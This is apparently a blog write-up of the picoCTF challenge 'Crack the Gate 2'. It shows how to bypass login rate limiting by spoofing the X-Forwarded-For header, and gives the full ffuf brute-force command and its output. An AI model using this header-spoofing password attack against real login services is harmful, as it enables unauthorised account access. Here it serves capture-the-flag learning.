T4QI
T4QI

Crack the Gate 2

18 May 2025 • 2 min read

The login system has been upgraded with a basic rate-limiting mechanism that locks out repeated failed attempts from the same source. We’ve received a tip that the system might still trust user-controlled headers. Your objective is to bypass the rate-limiting restriction and log in using the known email address: ctf-player@picoctf.org and uncover the hidden secret.Additional details will be available after launching your challenge instance.

Here as the description says we are rate limited and in the hints it tells us to know more about the X-Forwarde-For header and simply we need to add this header to our request with a proxy ip (I used Google’s) and I used ffuf to speed up brute forcing and better than using Burp Intruder.

BASH 
ffuf -u http://amiable-citadel.picoctf.net:57519/login -H "Content-Type: application/json" -H "X-Forwarded-For: 203.0.113.195" -w passwords.txt:FUZZ -d '{"email":"ctf-player@picoctf.org","password":"FUZZ"}' -X POST -mc 200 -ac -t 50

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : POST
 :: URL              : http://amiable-citadel.picoctf.net:57519/login
 :: Wordlist         : FUZZ: /home/t4qi/CTFs/Platforms/PICO-CTF/WEB/Medium/crack_the_gate_2/passwords.txt
 :: Header           : Content-Type: application/json
 :: Header           : X-Forwarded-For: 203.0.113.195
 :: Data             : {"email":"ctf-player@picoctf.org","password":"FUZZ"}
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200
________________________________________________

KTxyUtJw                [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 206ms]
fFWxC3W6                [Status: 200, Size: 132, Words: 1, Lines: 1, Duration: 206ms]
jCzS5pSV                [Status: 200, Size: 17, Words: 1, Lines: 1, Duration: 205ms]
:: Progress: [20/20] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

the output of this command will give us three passwords and one of them got the biggest size then I tried it and got the flag.

Start searching

Enter keywords to search articles.

↑↓ Navigate
Select
ESC Close
CtrlK Shortcut